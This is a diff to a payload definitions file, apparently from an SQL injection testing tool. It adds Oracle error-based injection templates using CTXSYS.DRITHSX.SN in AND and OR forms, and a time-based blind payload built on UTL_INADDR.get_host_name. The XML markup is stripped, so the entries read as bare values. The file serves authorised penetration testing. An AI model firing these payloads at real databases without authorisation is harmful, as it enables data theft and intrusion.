diff --git a/xml/payloads.xml b/xml/payloads.xml index 03ef44f89..0695437bd 100644 --- a/xml/payloads.xml +++ b/xml/payloads.xml @@ -792,6 +792,25 @@ Formats: + + Oracle AND error-based - WHERE clause (ctxsys.drithsx.sn) + 2 + 3 + 0 + 1 + 1 + AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM], '[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]') + + AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Oracle +
+
+ Firebird AND error-based - WHERE clause 2 @@ -907,6 +926,25 @@ Formats: + + Oracle OR error-based - WHERE clause (ctxsys.drithsx.sn) + 2 + 3 + 0 + 1 + 1 + OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM], '[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]') + + OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Oracle +
+
+ Firebird OR error-based - WHERE clause 2 @@ -1380,6 +1418,24 @@ Formats: + + Oracle AND time-based blind (heavy query) + 5 + 2 + 1 + 1,2,3 + 1 + + AND (SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM DUAL)>0 + + + + +
+ Oracle +
+
+ Oracle AND time-based blind (heavy query) 5